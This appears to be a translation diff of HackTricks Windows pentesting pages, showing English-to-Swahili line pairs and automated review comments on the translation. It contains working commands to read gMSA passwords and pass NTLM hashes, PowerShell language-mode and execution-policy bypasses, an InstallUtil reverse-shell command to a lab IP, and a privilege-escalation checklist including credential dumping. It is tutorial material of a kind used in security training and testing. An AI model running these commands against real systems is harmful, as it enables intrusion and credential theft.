Katika mazingira mengi, watumiaji wenye vigezo vya chini wanaweza kupitisha kwa siri za gMSA bila kuathiri DC kwa kutumia vibaya ACL za vitu zilizopangwa vibaya:
Katika mazingira mengi, watumiaji wenye ruhusa ndogo wanaweza kufikia siri za gMSA bila kuharibu DC kwa kunyanyasa ACLs za vitu zilizo na usanidi mbaya:
- Kundi unachosimamia (mfano, via GenericAll/GenericWrite) umepewa `ReadGMSAPassword` juu ya gMSA.
- Kwa kujiunga na kundi hilo, unapata haki ya read blob ya `msDS-ManagedPassword` ya gMSA kupitia LDAP na kupata NTLM credentials zinazotumika.
- Kundi unachoweza kudhibiti (kwa mfano, kupitia GenericAll/GenericWrite) kimetolewa ruhusa ya `ReadGMSAPassword` juu ya gMSA.
- Kwa kujiongeza kwenye kundi hilo, unapata haki ya kusoma blob ya `msDS-ManagedPassword` ya gMSA kupitia LDAP na kupata vigezo vya NTLM vinavyoweza kutumika.
Mtiririko wa kawaida wa kazi:
Typical workflow:
1) Gundua njia kwa kutumia BloodHound na taja principals zako za foothold kama Owned. Angalia edges kama:
1) Gundua njia kwa kutumia BloodHound na bainisha foothold principals zako kama Owned. Tafuta edges kama:
- GroupA GenericAll -> GroupB; GroupB ReadGMSAPassword -> gMSA
2) Jumuisha wewe mwenyewe katika kundi la kati unaolisimamia (mfano kwa bloodyAD):
2) Jiongeze kwenye kundi la kati unalodhibiti (mfano kwa bloodyAD):
```bash
bloodyAD --host <DC.FQDN> -d <domain> -u <user> -p <pass> add groupMember <GroupWithReadGmsa> <user>
```
3) Soma neno la siri la gMSA linalosimamiwa kupitia LDAP na tengeneza hash ya NTLM. NetExec inafanya otomatiki uondoaji wa `msDS-ManagedPassword` na uongofu hadi NTLM:
3) Soma nenosiri la gMSA lililodhibitiwa kupitia LDAP na pata hash ya NTLM. NetExec inafanya kwa otomatiki uondoaji wa `msDS-ManagedPassword` na kuibadilisha kuwa NTLM:
```bash
# Shows PrincipalsAllowedToReadPassword and computes NTLM automatically
netexec ldap <DC.FQDN> -u <user> -p <pass> --gmsa
# Account: mgtsvc$  NTLM: edac7f05cded0b410232b7466ec47d6f
```
4) Thibitisha kama gMSA ukitumia NTLM hash (plaintext haidingiki). Ikiwa akaunti iko katika Remote Management Users, WinRM itafanya kazi moja kwa moja:
4) Thibitisha kama gMSA ukitumia NTLM hash (hakuna plaintext inayohitajika). Ikiwa akaunti iko katika Remote Management Users, WinRM itafanya kazi moja kwa moja:
```bash
# SMB / WinRM as the gMSA using the NT hash
netexec smb   <DC.FQDN> -u 'mgtsvc$' -H <NTLM>
netexec winrm <DC.FQDN> -u 'mgtsvc$' -H <NTLM>
```
Vidokezo:
- Usomaji wa LDAP wa `msDS-ManagedPassword` unahitaji sealing (mfano: LDAPS/sign+seal). Zana zinashughulikia hili moja kwa moja.
- gMSAs mara nyingi hupewa haki za ndani kama WinRM; thibitisha uanachama wa kikundi (mfano: Remote Management Users) ili kupanga lateral movement.
- Ikiwa unahitaji blob tu ili kuhesabu NTLM wewe mwenyewe, ona muundo wa MSDS-MANAGEDPASSWORD_BLOB.
Notes:
- LDAP reads of `msDS-ManagedPassword` require sealing (e.g., LDAPS/sign+seal). Zana zinasimamia hili kiotomatiki.
- gMSAs are often granted local rights like WinRM; thibitisha uanachama wa vikundi (e.g., Remote Management Users) ili kupanga lateral movement.
- If you only need the blob to compute the NTLM yourself, see MSDS-MANAGEDPASSWORD_BLOB structure.
## LAPS
The **Local Administrator Password Solution (LAPS)**, available for download from [Microsoft](https://www.microsoft.com/en-us/download/details.aspx?id=46899), inaruhusu usimamizi wa nywila za Administrator wa mkoa. Nywila hizi, ambazo ni **zilizoanzishwa kwa nasibu**, za kipekee, na **zinabadilishwa mara kwa mara**, zinahifadhiwa kati katika Active Directory. Upatikanaji wa nywila hizi umefungwa kupitia ACLs kwa watumiaji walioteuliwa. Ikiwa ruhusa za kutosha zimepewa, uwezo wa kusoma nywila za admin wa mkoa unapatikana.
The **Local Administrator Password Solution (LAPS)**, available for download from [Microsoft](https://www.microsoft.com/en-us/download/details.aspx?id=46899), inaruhusu usimamizi wa nywila za local Administrator. Nywila hizi, ambazo ni **randomized**, za kipekee, na **regularly changed**, zinahifadhiwa katikati katika Active Directory. Upataji wa nywila hizi umepunguzwa kupitia ACLs kwa watumiaji walioidhinishwa. Ikiwa ruhusa za kutosha zimepewa, uwezo wa kusoma nywila za admin wa ndani unapatikana.
{{#ref}}
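Review bot: "haiwezi kutumika kwa ingia ya mtumiaji wa kisasa (interactive logins)" in the gMSA "Enhanced Security" bullet mistranslates "interactive" ("kisasa" means modern); keep the English term in parentheses and drop "wa kisasa". Several other replacements in this hunk move previously Swahili text back to English or to a wrong word: "Key Takeaways:", "Typical workflow:", "Notes:" with its three half-English bullets and the heading "### Abusing ACL chaining to read gMSA managed password ..." (the lines they replace were already translated); "kunyanyasa ACLs" (to harass) where the old line had "kutumia vibaya"; "zinafufuliwa (decrypted)" (to resurrect) where the same hunk elsewhere uses "kufungua (decryption)"; and, in the EFS paragraph, "unayejulikana" for "unaojulikana" plus the untranslated "More details can be found [here]".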
@ -207,22 +207,22 @@ The **Local Administrator Password Solution (LAPS)**, available for download fro
## PS Constrained Language Mode
PowerShell [**Constrained Language Mode**](https://devblogs.microsoft.com/powershell/powershell-constrained-language-mode/) **inazuia vipengele vingi** vinavyohitajika ili kutumia PowerShell kwa ufanisi, kama kuzuia COM objects, kuruhusu tu aina za .NET zilizokubaliwa, XAML-based workflows, PowerShell classes, na zaidi.
PowerShell [**Constrained Language Mode**](https://devblogs.microsoft.com/powershell/powershell-constrained-language-mode/) **inazuia vipengele vingi** vinavyohitajika kutumia PowerShell kwa ufanisi, kama vile kuzuia COM objects, kuruhusu tu aina za .NET zilizokubaliwa, XAML-based workflows, PowerShell classes, na zaidi.
### **Kagua**
### **Angalia**
```bash
$ExecutionContext.SessionState.LanguageMode
#Values could be: FullLanguage or ConstrainedLanguage
```
### Kuvuka
### Bypass
```bash
#Easy bypass
Powershell -version 2
```
Kwenye Windows za sasa bypass hiyo haitafanya kazi lakini unaweza kutumia [ **PSByPassCLM**](https://github.com/padovah4ck/PSByPassCLM).\
**Ili kuikompaila unaweza kuhitaji** **kufanya** _**Add a Reference**_ -> _Browse_ -> _Browse_ -> ongeza `C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0\31bf3856ad364e35\System.Management.Automation.dll` na **badilisha project kuwa .Net4.5**.
Katika Windows za sasa Bypass hiyo haitafanya kazi lakini unaweza kutumia[ **PSByPassCLM**](https://github.com/padovah4ck/PSByPassCLM).\
**Ili kuikompaila huenda ukahitaji** **_Ongeza Marejeo_** -> _Vinjari_ -> _Vinjari_ -> ongeza `C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0\31bf3856ad364e35\System.Management.Automation.dll` na **badilisha mradi kuwa .Net4.5**.
#### Bypass ya moja kwa moja:
#### Moja kwa moja bypass:
```bash
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /U c:\temp\psby.exe
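Review bot: "unaweza kutumia[ **PSByPassCLM**]" in the new line is missing the space between "kutumia" and the link, so the word runs into the link text; the following line translates the Visual Studio menu items into "_Ongeza Marejeo_ -> _Vinjari_ -> _Vinjari_", but those labels are shown in English in the IDE, so keep them as "_Add a Reference_ -> _Browse_ -> _Browse_" as the replaced line did and translate only the surrounding prose.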
```
@ -230,11 +230,11 @@ C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogTo
```bash
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /revshell=true /rhost=10.10.13.206 /rport=443 /U c:\temp\psby.exe
```
Unaweza kutumia [**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) au [**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) ili **kutekeleza Powershell** code katika mchakato wowote na kuepuka constrained mode. Kwa taarifa zaidi angalia: [https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-constrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-constrained-language-mode).
Unaweza kutumia [**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) au [**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) ili **execute Powershell** code katika mchakato wowote na bypass constrained mode. Kwa maelezo zaidi angalia: [https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-constrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-constrained-language-mode).
## Sera ya Utekelezaji ya PS
Kwa chaguo-msingi imewekwa kuwa **restricted.** Njia kuu za kuepuka sera hii:
Kwa chaguo-msingi imewekwa kuwa **restricted.** Njia kuu za bypass sera hii:
```bash
1º Just copy and paste inside the interactive PS console
2º Read en Exec
 | 
			
		||||
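Review bot: the reverse-shell example hardcodes a lab address (`/rhost=10.10.13.206 /rport=443`); use labelled placeholders such as `<LHOST>` and `<LPORT>` so readers do not copy a stale IP, and tag this fence `cmd`/`powershell` as well, since it is again a Windows command under a `bash` tag. In the translated prose the old line rendered "bypass" as "kuepuka" while the new line keeps the English word inside a Swahili sentence ("ili **execute Powershell** code ... na bypass constrained mode", "Njia kuu za bypass sera hii"); pick one convention, because half-translated sentences read worse than either the old or a fully English version.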
@ -254,32 +254,32 @@ Powershell -command "Write-Host 'My voice is my passport, verify me.'"
 | 
			
		||||
9º Use EncodeCommand
 | 
			
		||||
$command = "Write-Host 'My voice is my passport, verify me.'" $bytes = [System.Text.Encoding]::Unicode.GetBytes($command) $encodedCommand = [Convert]::ToBase64String($bytes) powershell.exe -EncodedCommand $encodedCommand
 | 
			
		||||
```
 | 
			
		||||
Zaidi zinaweza kupatikana [here](https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/)
 | 
			
		||||
Taarifa zaidi zinaweza kupatikana [here](https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/)
 | 
			
		||||
 | 
			
		||||
## Security Support Provider Interface (SSPI)
 | 
			
		||||
## Kiolesura cha Security Support Provider (SSPI)
 | 
			
		||||
 | 
			
		||||
Ni API inayotumika kuthibitisha watumiaji.
 | 
			
		||||
Ni API inayoweza kutumika kuthibitisha watumiaji.
 | 
			
		||||
 | 
			
		||||
SSPI itawajibika kutafuta itifaki inayofaa kwa mashine mbili zinazotaka kuwasiliana. Njia inayopendekezwa kwa hili ni Kerberos. Kisha SSPI itajadili itifaki gani ya uthibitishaji itakayotumika; itifaki hizi za uthibitishaji zinaitwa Security Support Provider (SSP), ziko ndani ya kila mashine ya Windows kama DLL na mashine zote mbili lazima ziunge mkono ile ile ili ziweze kuwasiliana.
 | 
			
		||||
SSPI itakuwa na jukumu la kupata itifaki inayofaa kwa mashine mbili zinazotaka kuwasiliana. Njia inayopendekezwa kwa hili ni Kerberos. Kisha SSPI itajadili ni itifaki gani ya uthibitishaji itakayotumika; itifaki hizi za uthibitishaji zinaitwa Security Support Provider (SSP), ziko ndani ya kila mashine ya Windows kwa muundo wa DLL na mashine zote mbili lazima ziunge mkono ile ile ili ziweze kuwasiliana.
 | 
			
		||||
 | 
			
		||||
### SSP kuu
 | 
			
		||||
 | 
			
		||||
- **Kerberos**: Inayopendekezwa
 | 
			
		||||
- %windir%\Windows\System32\kerberos.dll
 | 
			
		||||
- **NTLMv1** and **NTLMv2**: Sababu za utangamano
 | 
			
		||||
- **NTLMv1** and **NTLMv2**: Kwa sababu za utangamano
 | 
			
		||||
- %windir%\Windows\System32\msv1_0.dll
 | 
			
		||||
- **Digest**: Web servers na LDAP, nenosiri kwa fomu ya MD5 hash
 | 
			
		||||
- **Digest**: Seva za wavuti na LDAP, nywila katika fomu ya hash ya MD5
 | 
			
		||||
- %windir%\Windows\System32\Wdigest.dll
 | 
			
		||||
- **Schannel**: SSL and TLS
 | 
			
		||||
- **Schannel**: SSL na TLS
 | 
			
		||||
- %windir%\Windows\System32\Schannel.dll
 | 
			
		||||
- **Negotiate**: Inatumika kujadiliana itifaki ya kutumia (Kerberos au NTLM, Kerberos ikiwa chaguo-msingi)
 | 
			
		||||
- **Negotiate**: Inatumika kujadiliana itifaki itakayotumika (Kerberos au NTLM, Kerberos ikiwa chaguo-msingi)
 | 
			
		||||
- %windir%\Windows\System32\lsasrv.dll
 | 
			
		||||
 | 
			
		||||
#### Mazungumzo yanaweza kutoa njia kadhaa au njia moja tu.
 | 
			
		||||
 | 
			
		||||
## UAC - User Account Control
 | 
			
		||||
## UAC - Udhibiti wa Akaunti ya Mtumiaji (User Account Control)
 | 
			
		||||
 | 
			
		||||
[User Account Control (UAC)](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works) ni kipengele kinachowezesha **maombi ya idhini kwa shughuli zinazohitaji ruhusa ya juu**.
 | 
			
		||||
[User Account Control (UAC)](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works) ni kipengele kinachowezesha **ombi la ridhaa kwa shughuli zinazohitaji ruhusa za juu**.
 | 
			
		||||
 | 
			
		||||
 | 
			
		||||
{{#ref}}
 | 
			
		||||
 | 
			
		||||
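Review bot: the `9º Use EncodeCommand` example collapses four statements onto one line (`$command = "Write-Host 'My voice is my passport, verify me.'" $bytes = [System.Text.Encoding]::Unicode.GetBytes($command) $encodedCommand = [Convert]::ToBase64String($bytes) powershell.exe -EncodedCommand $encodedCommand`), which is a syntax error when pasted into a console; separate them with newlines or `;`. The SSP file paths are also wrong: `%windir%` already expands to `C:\Windows`, so `%windir%\Windows\System32\kerberos.dll` (and the same pattern on the msv1_0.dll, Wdigest.dll, Schannel.dll and lsasrv.dll lines) should read `%windir%\System32\...`. Both defects are unchanged between the old and new side of the hunk, so they are pre-existing, but a translation pass that touches every one of these lines is the natural place to fix them.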
@ -1,88 +1,88 @@
 | 
			
		||||
# Orodha ya ukaguzi - Local Windows Privilege Escalation
 | 
			
		||||
# Orodha ya Ukaguzi - Local Windows Privilege Escalation
 | 
			
		||||
 | 
			
		||||
{{#include ../banners/hacktricks-training.md}}
 | 
			
		||||
 | 
			
		||||
### **Zana bora ya kutafuta Windows local privilege escalation vectors:** [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)
 | 
			
		||||
### **Chombo bora cha kutafuta Windows local privilege escalation vectors:** [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)
 | 
			
		||||
 | 
			
		||||
### [System Info](windows-local-privilege-escalation/index.html#system-info)
 | 
			
		||||
### [Taarifa za Mfumo](windows-local-privilege-escalation/index.html#system-info)
 | 
			
		||||
 | 
			
		||||
- [ ] Pata [**System information**](windows-local-privilege-escalation/index.html#system-info)
 | 
			
		||||
- [ ] Pata [**Taarifa za Mfumo**](windows-local-privilege-escalation/index.html#system-info)
 | 
			
		||||
- [ ] Tafuta **kernel** [**exploits using scripts**](windows-local-privilege-escalation/index.html#version-exploits)
 | 
			
		||||
- [ ] Tumia **Google to search** for kernel **exploits**
 | 
			
		||||
- [ ] Tumia **searchsploit to search** for kernel **exploits**
 | 
			
		||||
- [ ] Kuna taarifa ya kuvutia katika [**env vars**](windows-local-privilege-escalation/index.html#environment)?
 | 
			
		||||
- [ ] Manenosiri katika [**PowerShell history**](windows-local-privilege-escalation/index.html#powershell-history)?
 | 
			
		||||
- [ ] Taarifa za kuvutia katika [**Internet settings**](windows-local-privilege-escalation/index.html#internet-settings)?
 | 
			
		||||
- [ ] Tumia **Google** kutafuta kernel **exploits**
 | 
			
		||||
- [ ] Tumia **searchsploit** kutafuta kernel **exploits**
 | 
			
		||||
- [ ] Je, kuna taarifa za kuvutia katika [**env vars**](windows-local-privilege-escalation/index.html#environment)?
 | 
			
		||||
- [ ] Je, kuna nywila katika [**PowerShell history**](windows-local-privilege-escalation/index.html#powershell-history)?
 | 
			
		||||
- [ ] Je, kuna taarifa za kuvutia katika [**Internet settings**](windows-local-privilege-escalation/index.html#internet-settings)?
 | 
			
		||||
- [ ] [**Drives**](windows-local-privilege-escalation/index.html#drives)?
 | 
			
		||||
- [ ] [**WSUS exploit**](windows-local-privilege-escalation/index.html#wsus)?
 | 
			
		||||
- [ ] [**Third-party agent auto-updaters / IPC abuse**](windows-local-privilege-escalation/abusing-auto-updaters-and-ipc.md)
 | 
			
		||||
- [ ] [**AlwaysInstallElevated**](windows-local-privilege-escalation/index.html#alwaysinstallelevated)?
 | 
			
		||||
 | 
			
		||||
### [Logging/AV enumeration](windows-local-privilege-escalation/index.html#enumeration)
 | 
			
		||||
### [Uchunguzi wa Logging/AV](windows-local-privilege-escalation/index.html#enumeration)
 | 
			
		||||
 | 
			
		||||
- [ ] Angalia [**Audit** ](windows-local-privilege-escalation/index.html#audit-settings) na [**WEF** ](windows-local-privilege-escalation/index.html#wef) mipangilio
 | 
			
		||||
- [ ] Angalia [**LAPS**](windows-local-privilege-escalation/index.html#laps)
 | 
			
		||||
- [ ] Angalia ikiwa [**WDigest** ](windows-local-privilege-escalation/index.html#wdigest) inafanya kazi
 | 
			
		||||
- [ ] Kagua [**Audit**](windows-local-privilege-escalation/index.html#audit-settings) na [**WEF**](windows-local-privilege-escalation/index.html#wef) mipangilio
 | 
			
		||||
- [ ] Kagua [**LAPS**](windows-local-privilege-escalation/index.html#laps)
 | 
			
		||||
- [ ] Kagua kama [**WDigest**](windows-local-privilege-escalation/index.html#wdigest) iko imewezeshwa
 | 
			
		||||
- [ ] [**LSA Protection**](windows-local-privilege-escalation/index.html#lsa-protection)?
 | 
			
		||||
- [ ] [**Credentials Guard**](windows-local-privilege-escalation/index.html#credentials-guard)[?](windows-local-privilege-escalation/index.html#cached-credentials)
 | 
			
		||||
- [ ] [**Cached Credentials**](windows-local-privilege-escalation/index.html#cached-credentials)?
 | 
			
		||||
- [ ] Angalia ikiwa kuna [**AV**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/windows-av-bypass/README.md)
 | 
			
		||||
- [ ] Kagua kama kuna [**AV**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/windows-av-bypass/README.md)
 | 
			
		||||
- [ ] [**AppLocker Policy**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/authentication-credentials-uac-and-efs/README.md#applocker-policy)?
 | 
			
		||||
- [ ] [**UAC**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control/README.md)
 | 
			
		||||
- [ ] [**User Privileges**](windows-local-privilege-escalation/index.html#users-and-groups)
 | 
			
		||||
- [ ] Angalia [**current** user **privileges**](windows-local-privilege-escalation/index.html#users-and-groups)
 | 
			
		||||
- [ ] Kagua [**current** user **privileges**](windows-local-privilege-escalation/index.html#users-and-groups)
 | 
			
		||||
- [ ] Je, wewe ni [**member of any privileged group**](windows-local-privilege-escalation/index.html#privileged-groups)?
 | 
			
		||||
- [ ] Angalia ikiwa una [any of these tokens enabled](windows-local-privilege-escalation/index.html#token-manipulation): **SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebugPrivilege** ?
 | 
			
		||||
- [ ] Kagua kama una [any of these tokens enabled](windows-local-privilege-escalation/index.html#token-manipulation): **SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebugPrivilege** ?
 | 
			
		||||
- [ ] [**Users Sessions**](windows-local-privilege-escalation/index.html#logged-users-sessions)?
 | 
			
		||||
- [ ] Angalia[ **users homes**](windows-local-privilege-escalation/index.html#home-folders) (ufikia?)
 | 
			
		||||
- [ ] Angalia [**Password Policy**](windows-local-privilege-escalation/index.html#password-policy)
 | 
			
		||||
- [ ] Nini kimepo[ **inside the Clipboard**](windows-local-privilege-escalation/index.html#get-the-content-of-the-clipboard)?
 | 
			
		||||
- [ ] Kagua [ **users homes**](windows-local-privilege-escalation/index.html#home-folders) (ufikaji?)
 | 
			
		||||
- [ ] Kagua [**Password Policy**](windows-local-privilege-escalation/index.html#password-policy)
 | 
			
		||||
- [ ] Kuna nini [ **katika Clipboard**](windows-local-privilege-escalation/index.html#get-the-content-of-the-clipboard)?
 | 
			
		||||
 | 
			
		||||
### [Network](windows-local-privilege-escalation/index.html#network)
 | 
			
		||||
### [Mtandao](windows-local-privilege-escalation/index.html#network)
 | 
			
		||||
 | 
			
		||||
- [ ] Angalia **current** [**network** **information**](windows-local-privilege-escalation/index.html#network)
 | 
			
		||||
- [ ] Angalia **hidden local services** zinazopatikana kutoka nje
 | 
			
		||||
- [ ] Kagua [**taarifa za mtandao**](windows-local-privilege-escalation/index.html#network) ya sasa
 | 
			
		||||
- [ ] Kagua huduma za ndani zilizofichika zinazotengwa kwa nje
 | 
			
		||||
 | 
			
		||||
### [Running Processes](windows-local-privilege-escalation/index.html#running-processes)
 | 
			
		||||
### [Michakato Inayoendeshwa](windows-local-privilege-escalation/index.html#running-processes)
 | 
			
		||||
 | 
			
		||||
- [ ] Processes binaries [**file and folders permissions**](windows-local-privilege-escalation/index.html#file-and-folder-permissions)
 | 
			
		||||
- [ ] Idhini za [**file and folders**] za binaries za michakato (permissions) (windows-local-privilege-escalation/index.html#file-and-folder-permissions)
 | 
			
		||||
- [ ] [**Memory Password mining**](windows-local-privilege-escalation/index.html#memory-password-mining)
 | 
			
		||||
- [ ] [**Insecure GUI apps**](windows-local-privilege-escalation/index.html#insecure-gui-apps)
 | 
			
		||||
- [ ] Pora credentials kwa **interesting processes** kwa kutumia `ProcDump.exe` ? (firefox, chrome, etc ...)
 | 
			
		||||
- [ ] Pora nywila kwa michakato yenye [**vitu vya kuvutia**] kwa kutumia `ProcDump.exe` ? (firefox, chrome, n.k.)
 | 
			
		||||
 | 
			
		||||
### [Services](windows-local-privilege-escalation/index.html#services)
 | 
			
		||||
 | 
			
		||||
- [ ] [Can you **modify any service**?](windows-local-privilege-escalation/index.html#permissions)
 | 
			
		||||
- [ ] [Can you **modify** the **binary** that is **executed** by any **service**?](windows-local-privilege-escalation/index.html#modify-service-binary-path)
 | 
			
		||||
- [ ] [Can you **modify** the **registry** of any **service**?](windows-local-privilege-escalation/index.html#services-registry-modify-permissions)
 | 
			
		||||
- [ ] [Can you take advantage of any **unquoted service** binary **path**?](windows-local-privilege-escalation/index.html#unquoted-service-paths)
 | 
			
		||||
- [ ] Je, unaweza **kubadilisha service yoyote**? (windows-local-privilege-escalation/index.html#permissions)
 | 
			
		||||
- [ ] Je, unaweza **kubadilisha** **binary** inayotekelezwa na service yoyote? (windows-local-privilege-escalation/index.html#modify-service-binary-path)
 | 
			
		||||
- [ ] Je, unaweza **kubadilisha** **registry** ya service yoyote? (windows-local-privilege-escalation/index.html#services-registry-modify-permissions)
 | 
			
		||||
- [ ] Je, unaweza kuchukua faida ya njia ya binary isiyo na nukuu ya service yoyote? (windows-local-privilege-escalation/index.html#unquoted-service-paths)
 | 
			
		||||
 | 
			
		||||
### [**Applications**](windows-local-privilege-escalation/index.html#applications)
 | 
			
		||||
### [Programu](windows-local-privilege-escalation/index.html#applications)
 | 
			
		||||
 | 
			
		||||
- [ ] **Write** [**permissions on installed applications**](windows-local-privilege-escalation/index.html#write-permissions)
 | 
			
		||||
- [ ] [**Write**] ruhusa kwenye programu zilizosakinishwa (windows-local-privilege-escalation/index.html#write-permissions)
 | 
			
		||||
- [ ] [**Startup Applications**](windows-local-privilege-escalation/index.html#run-at-startup)
 | 
			
		||||
- [ ] **Vulnerable** [**Drivers**](windows-local-privilege-escalation/index.html#drivers)
 | 
			
		||||
- [ ] [**Vulnerable** Drivers](windows-local-privilege-escalation/index.html#drivers)
 | 
			
		||||
 | 
			
		||||
### [DLL Hijacking](windows-local-privilege-escalation/index.html#path-dll-hijacking)
 | 
			
		||||
 | 
			
		||||
- [ ] Je, unaweza **write in any folder inside PATH**?
 | 
			
		||||
- [ ] Je, kuna binary ya huduma inayojulikana ambayo **tries to load any non-existant DLL**?
 | 
			
		||||
- [ ] Je, unaweza **write** in any **binaries folder**?
 | 
			
		||||
- [ ] Je, unaweza **kuandika** katika folda yoyote ndani ya PATH?
 | 
			
		||||
- [ ] Je, kuna binary ya service inayojulikana ambayo **inajaribu kupakia DLL isiyokuwepo**?
 | 
			
		||||
- [ ] Je, unaweza **kuandika** katika **folder za binaries** yoyote?
 | 
			
		||||
 | 
			
		||||
### [Network](windows-local-privilege-escalation/index.html#network)
 | 
			
		||||
### [Mtandao](windows-local-privilege-escalation/index.html#network)
 | 
			
		||||
 | 
			
		||||
- [ ] Orodhesha mtandao (shares, interfaces, routes, neighbours, ...)
 | 
			
		||||
- [ ] Angalia kwa makini network services listening on localhost (127.0.0.1)
 | 
			
		||||
- [ ] Fanya uorodheshaji wa mtandao (shares, interfaces, routes, neighbours, ...)
 | 
			
		||||
- [ ] Tazama kwa makini huduma za mtandao zinazolisikiliza localhost (127.0.0.1)
 | 
			
		||||
 | 
			
		||||
### [Windows Credentials](windows-local-privilege-escalation/index.html#windows-credentials)
 | 
			
		||||
 | 
			
		||||
- [ ] [**Winlogon** ](windows-local-privilege-escalation/index.html#winlogon-credentials)credentials
 | 
			
		||||
- [ ] [**Winlogon** ](windows-local-privilege-escalation/index.html#winlogon-credentials) credentials
 | 
			
		||||
- [ ] [**Windows Vault**](windows-local-privilege-escalation/index.html#credentials-manager-windows-vault) credentials ambazo unaweza kutumia?
 | 
			
		||||
- [ ] Taarifa za kuvutia katika [**DPAPI credentials**](windows-local-privilege-escalation/index.html#dpapi)?
 | 
			
		||||
- [ ] Manenosiri za mitandao zilizohifadhiwa za [**Wifi networks**](windows-local-privilege-escalation/index.html#wifi)?
 | 
			
		||||
- [ ] Je, kuna [**DPAPI credentials**](windows-local-privilege-escalation/index.html#dpapi) za kuvutia?
 | 
			
		||||
- [ ] Nywila za [**Wifi networks**](windows-local-privilege-escalation/index.html#wifi)?
 | 
			
		||||
- [ ] Taarifa za kuvutia katika [**saved RDP Connections**](windows-local-privilege-escalation/index.html#saved-rdp-connections)?
 | 
			
		||||
- [ ] Manenosiri katika [**recently run commands**](windows-local-privilege-escalation/index.html#recently-run-commands)?
 | 
			
		||||
- [ ] [**Remote Desktop Credentials Manager**](windows-local-privilege-escalation/index.html#remote-desktop-credential-manager) manenosiri?
 | 
			
		||||
- [ ] Nywila katika [**recently run commands**](windows-local-privilege-escalation/index.html#recently-run-commands)?
 | 
			
		||||
- [ ] [**Remote Desktop Credentials Manager**](windows-local-privilege-escalation/index.html#remote-desktop-credential-manager) nywila?
 | 
			
		||||
- [ ] [**AppCmd.exe** exists](windows-local-privilege-escalation/index.html#appcmd-exe)? Credentials?
 | 
			
		||||
- [ ] [**SCClient.exe**](windows-local-privilege-escalation/index.html#scclient-sccm)? DLL Side Loading?
 | 
			
		||||
 | 
			
		||||
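Review bot: several new lines break the markdown link syntax and will render as literal brackets followed by a bare path: `- [ ] Idhini za [**file and folders**] za binaries za michakato (permissions) (windows-local-privilege-escalation/index.html#file-and-folder-permissions)`, the `Pora nywila kwa michakato yenye [**vitu vya kuvutia**]` line, the four service questions (`Je, unaweza **kubadilisha service yoyote**? (windows-local-privilege-escalation/index.html#permissions)` and the three after it) and `[**Write**] ruhusa kwenye programu zilizosakinishwa (...)`; keep `[text](url)` together as the old lines did. Two meaning changes should also be reverted: "huduma za ndani zilizofichika zinazotengwa kwa nje" turns the old "zinazopatikana kutoka nje" ("reachable from outside") into "isolated from outside", since "kutengwa" means to be set apart, and the `### [Programu]` heading dropped the bold that every sibling heading keeps. Minor: `[ **users homes**]` and `[ **katika Clipboard**]` carry a leading space inside the link text.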
@ -90,19 +90,19 @@
 | 
			
		||||
 | 
			
		||||
- [ ] **Putty:** [**Creds**](windows-local-privilege-escalation/index.html#putty-creds) **and** [**SSH host keys**](windows-local-privilege-escalation/index.html#putty-ssh-host-keys)
 | 
			
		||||
- [ ] [**SSH keys in registry**](windows-local-privilege-escalation/index.html#ssh-keys-in-registry)?
 | 
			
		||||
- [ ] Manenosiri katika [**unattended files**](windows-local-privilege-escalation/index.html#unattended-files)?
 | 
			
		||||
- [ ] Any [**SAM & SYSTEM**](windows-local-privilege-escalation/index.html#sam-and-system-backups) backup?
 | 
			
		||||
- [ ] Nywila katika [**unattended files**](windows-local-privilege-escalation/index.html#unattended-files)?
 | 
			
		||||
- [ ] Kuna nakala za kuhifadhi za [**SAM & SYSTEM**](windows-local-privilege-escalation/index.html#sam-and-system-backups)?
 | 
			
		||||
- [ ] [**Cloud credentials**](windows-local-privilege-escalation/index.html#cloud-credentials)?
 | 
			
		||||
- [ ] [**McAfee SiteList.xml**](windows-local-privilege-escalation/index.html#mcafee-sitelist.xml) file?
 | 
			
		||||
- [ ] [**Cached GPP Password**](windows-local-privilege-escalation/index.html#cached-gpp-pasword)?
 | 
			
		||||
- [ ] Nenosiri katika [**IIS Web config file**](windows-local-privilege-escalation/index.html#iis-web-config)?
 | 
			
		||||
- [ ] Nywila katika [**IIS Web config file**](windows-local-privilege-escalation/index.html#iis-web-config)?
 | 
			
		||||
- [ ] Taarifa za kuvutia katika [**web** **logs**](windows-local-privilege-escalation/index.html#logs)?
 | 
			
		||||
- [ ] Unataka [**ask for credentials**](windows-local-privilege-escalation/index.html#ask-for-credentials) kwa mtumiaji?
